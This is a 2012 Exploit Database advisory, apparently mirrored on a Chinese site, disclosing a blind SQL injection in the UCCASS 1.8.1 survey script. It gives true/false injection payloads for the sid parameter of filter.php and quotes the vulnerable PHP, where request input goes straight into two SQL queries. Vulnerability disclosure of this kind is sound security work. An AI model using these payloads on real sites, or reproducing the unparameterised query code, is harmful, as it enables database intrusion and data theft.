UCCASS 1.8.1 – Blind SQL Injection

• Exploit Database
• 9 阅读

• 作者： dun
  日期： 2012-06-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/19386/

• :::::::-. ...::::::.:::.
   ;;, `';, ;; ;;;`;;;;,`;;;
   `[[ [[[[' [[[[[[[[. '[[
  $$,$$$$$$$$$$ "Y$c$$
  888_,o8P'88.d888888Y88
  MMMMP"` "YmmMMMM""MMM YM
  	
   [ Discovered by dun \ posdub[at]gmail.com ]
   [ 2012-06-22]
   #################################################################
   #[ UCCASS <= v1.8.1 ]Blind SQL Injection Vulnerability#
   #################################################################
   #
   # Script: "The Unit Command Climate Assessment and Survey System (UCCASS) (pronounced yoo-kas)
   #is a PHP based survey script that allows you to create online surveys..."
   #
   # Vendor: http://sourceforge.net/projects/uccass/
   # Download: http://sourceforge.net/projects/uccass/files/latest/download
   #
   ################################################################
   #
   # [SQL]
   #
   # Versions affected: v1.8.1 and previous
   #
   # Vuln: http://localhost/uccass/filter.php?sid=-1 or 1=1-- (true)
   # http://localhost/uccass/filter.php?sid=-1 or 1=2-- (false)
   #
  
   File: ./uccass/filter.php
   ...cut...
   <?php
  
   include('classes/main.class.php');
   include('classes/results.class.php'); // 1 definition of filter function
  
   $survey = new UCCASS_Results;
  
   echo $survey->com_header("Filter Survey Results");
  
   echo $survey->filter($_REQUEST['sid']); // 2 unfiltered $_REQUEST['sid'] var
  
   echo $survey->com_footer();
  
   ?>
   ...cut...
  
   File: ./uccass/classes/results.class.php ( lines: 441-479 )
   ...cut...
   function filter($sid)
   {
  $x = 0;
  $qid_list = '';
  
  foreach($_REQUEST['select_qid'] as $qid)
  { $qid_list .= (int)$qid . ','; }
  $qid_list = substr($qid_list,0,-1);
  
  $query = "SELECT at.aid, q.qid, q.question, s.survey_text_mode
  FROM {$this->CONF['db_tbl_prefix']}answer_types at,
  {$this->CONF['db_tbl_prefix']}questions q, {$this->CONF['db_tbl_prefix']}surveys s
  WHERE q.aid = at.aid AND q.sid = $sid AND q.qid IN ($qid_list) AND at.type IN ('MM','MS') // 3 [SQL]
  AND q.sid = s.sid
  ORDER BY q.page, q.oid";
  $rs = $this->db->Execute($query);
  
  $old_aid = '';
  if($rs === FALSE) { $this->error("Error selecting filter questions: " . $this->db->ErrorMsg()); }
  if($r = $rs->FetchRow())
  {
  do
  {
  $question['question'][] = nl2br($this->SfStr->getSafeString($r['question'],$r['survey_text_mode']));
  $question['encquestion'][] = $this->SfStr->getSafeString($r['question'],SAFE_STRING_TEXT);
  $question['aid'][] = $r['aid'];
  $question['qid'][] = $r['qid'];
  $temp = $this->get_answer_values($r['aid'],BY_AID,$r['survey_text_mode']);
  $question['value'][] = $temp['value'];
  $question['avid'][] = $temp['avid'];
  $x++;
  }while($r = $rs->FetchRow());
  $this->smarty->assign("question",$question);
  }
  $rs = $this->db->Execute("SELECT MIN(entered) AS mindate,
  MAX(entered) AS maxdate FROM
  {$this->CONF['db_tbl_prefix']}results WHERE sid = $sid"); // 4 [SQL]
  if($rs === FALSE) { $this->error("Error selecting min/max survey dates: " . $this->db->ErrorMsg()); }
  $r = $rs->FetchRow();
   ...cut...
  
   ### [ dun / 2012 ] #####################################################